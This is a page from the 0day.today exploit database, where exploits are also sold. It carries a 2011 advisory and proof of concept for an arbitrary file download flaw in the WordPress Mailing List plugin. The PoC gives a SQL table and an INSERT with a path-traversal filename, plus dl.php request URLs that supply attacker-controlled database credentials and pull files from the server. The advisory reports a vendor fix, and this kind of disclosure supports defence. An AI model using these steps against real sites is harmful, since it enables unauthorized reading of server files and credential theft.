0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Mailing List Plugin Arbitrary File Download
#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download #Version: < 1.4.2 #Date: 2011-12-19 #Author: 6Scan (http://6scan.com) security team #Software Link: http://wordpress.org/extend/plugins/mailz/ #Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly. #Description : Unauthorized users can download arbitrary files from the server using this exploit. # Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host. # The bug is in config.php, but accessible from other file. PoC 1) Setup mysql database 2) Create table with the next structure: CREATE TABLE IF NOT EXISTS `phplist_attachment` ( `filename` varchar(1024) NOT NULL, `mimetype` varchar(1024) NOT NULL, `remotefile` varchar(1024) NOT NULL, `description` varchar(1024) NOT NULL, `size` int(11) NOT NULL, `id` int(11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 3) Add this raw into database: INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES ('../../../../../somefile.txt', '', '', '', 0, 0); 4) Call the script with database parameters and file id to download: http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0 The credentials are now saved in session, and there is no need to continue passing them: http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1 http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2 http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3 # 0day.today [2024-12-24] #